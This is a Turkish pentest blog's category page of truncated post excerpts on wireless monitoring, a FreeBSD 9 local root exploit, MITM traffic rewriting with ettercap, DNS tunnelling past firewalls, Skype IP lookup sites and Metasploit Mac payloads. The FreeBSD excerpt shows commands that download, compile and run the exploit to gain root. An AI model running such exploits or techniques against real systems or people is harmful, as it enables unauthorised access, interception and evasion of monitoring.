Category: Pentest

Airodump-ng Fixed channel mon0: -1

Kablosuz ağları monitor ederken ve paket gönderirken, kullandığınız kablosuz ağ arabiriminin driver probleminden dolayı Airodump-ng programında aşağıdaki hatayı alabilirsiniz.   Bu durumda uygun driver’ı kurmak güzel bir çözüm, Harun ŞEKER‘in blog girdisinde benzer bir çözüme ulaşabilirsiniz. http://www.harunseker.org/2011/06/ubuntu-aireplay-ng-iwl4965-mon0-channel.html Aynı zamanda, driver kurmadan ilgili programlara –ignore-nagative-one komutunu ekleyerek de sorundan kurtulabilirsiniz (bir önceki çözüme göre daha pratik.) Örneğin; # airodump-ng –channel 1 –bssid...

FreeBSD 9 Yetki Yükseltme Açıklığı

Bu blog girdisi bizim sunucumuzdan (cehturkiye). Root parolamızı çeşitli nedenlerden dolayı unuttuk, bugün lazım oldu ve aşağıdaki detaylarını aktardığımız FreeBSD 9.0-9.1 sürümlerini etkileyen local root exploit ile yetki arttırımına gittik. İlgili exploit; http://www.exploit-db.com/exploits/26368/ Kullanımı $ wget http://www.exploit-db.com/download/26368 -O exp.c $ whoami ozanucar $ gcc -o exp exp.c $ chmod +x exp $ ./exp FreeBSD 9.{0,1} mmap/ptrace exploit by Hunger <fbsd9lul@hunger.hu> #...

HTTP Trafiğinde İçerik Bul Değiştir

Mitm gibi ağ trafiğini araya girerek izlemeye başladığınız durumlarda ettercap aracını kullanarak trafiği değiştirmeniz mümkün olabilir. Tabii benim gibi her lazım olduğunda “bunu nasıl yapıyorduk” diye söylenmiyorsanız..  Bu sefer üşenmiyorum buraya yazıyorum ve bir sonraki lazım oluşunda burada bulmayı umut ediyorum 🙂 Trafiğini üzerimize aldığımız istemcinin ziyaret ettiği web sayfasında küçük bir değişiklik yapmak istediğimizi varsayalım. Ben sayfaya yeni bir css bağlantısı eklemek istiyorum.....

Skype IP Resolver

Herhangi bir skype kullanıcısının IP adresini aşağıdaki kaynakları kullanarak tespit edebilirsiniz. Skype kullanıcısının kişi listenizde olmasına gerek kalmadan da IP adresini elde edebilirsiniz. Bilgi toplama aşamasında yada siber suçlarla mücadelede işe yarayabilir. İşte bir kaç adres, http://skypegrab.com/skype-beta http://iskyperesolve.com/ http://www.resolveme.org/index.php?do=resolve

Açık Ağlarda Bilgi Toplama – Recon-Ng

Açık ağlarda bilgi toplama son yılların en dikkat çekici konularından biri olarak karşımıza çıkıyor. Farklı çıktılarda bilgi toplamak için geliştirilmiş onlarca yazılım bulunmaktadır fakat bu yazılımların çoğu tek bir amaca yönelik ve diğer araçlar tarafından anlaşılacak çıktı üretememektedir. Recon-ng bu tip yazılımların yaptıkları işi tek bir merkezden ilişki kurarak gerçekleştirmeyi amaçlamış oldukça başarılı bir araç olarak karşımıza çıkmaktadır.

DNS Tünelleme / Tcp-Over-DNS

Senaryo Firewall ve Web Proxy (Content Filter) ile tüm internet trafiği engellenmiş bir kullanıcı internete ulaşmak istiyor. Yerel ağdan internete giden tüm port ve protokoller Firewal tarafından engellenmiştir. Web erişimi için hizmet veren proxy ise yalnızca yetkili kulllanıcılara internet erişimi sağlamaktadır. Bu sistemlere takılmadan sınırsız ve kayıt altına alınamaz internet trafği nasıl elde edilebilir ? DNS Tunnel Bir protokol içerisinde...

CTF Yarışması – Dünya kurtarılmayı bekliyor!

Siber saldırıların ve siber suçlarla mücadelede kullanılan tekniklerin  uygulamalı olarak yer aldığı siber savaş oyunu ‘Dünyayı Kurtaran Hacker’ 16-21 Aralık 2012 tarihleri arası başlıyor. Yarışma Prodaft (www.prodaft.com) tarafından organize edilmektedir ve kazananlara çeşitli hediyeler sunmaktadır.Bu yarışma güvenlik meraklılarına kendilerini deneyebilecekleri zorlu ve eğlenceli bir yarışma sunuyor. Ana misyonu dünyayı kurtarmak olan yarışmada, hacker’ların çeşitli alanlardaki problemleri çözmeleri bekleniyor. Ağ verilerinin...

NetSEC / VoIP Pentest Sunumu

20 Ekim 2012 Cumartesi günü Microsoft Türkiye’nin sponsorluğunda, NetSec Topluluk Buluşması – Bilgi Güvenliğinde Sızma Testlerinin Yeri ve Önemi etkinliğinde VoIP Pentest konulu bir sunum gerçekleştirdim. Katılan herkese teşekkür ederim. Sunum: www.cehturkiye.com/documents/voip_pentest_netsec_2012.pdf Fotoğraflar: https://www.facebook.com/media/set/?set=oa.461500177234414&type=1

Mac OS X için Kullanılabilecek Metasploit Payloadlar

Mac OS X, son kullanıcı tarafından son yıllarda yoğun olarak tercih edilen bir sistemdir. Mac OS X unix tabanlı bir işletim sistemidir ve son kullanıcı arasında diğer işletim sistemlerine nazaran daha güvenli olduğu düşünülür ! Bu blog girdisinde saldırganların, Mac OS  X sistemleri ele geçirmek için kullandığı araç ve yöntemlere giriş yapılmıştır. Mac OS X sistemler için oluşturulan payloadların hangi teknikler...

CEH Türkiye Hosting Sponsoru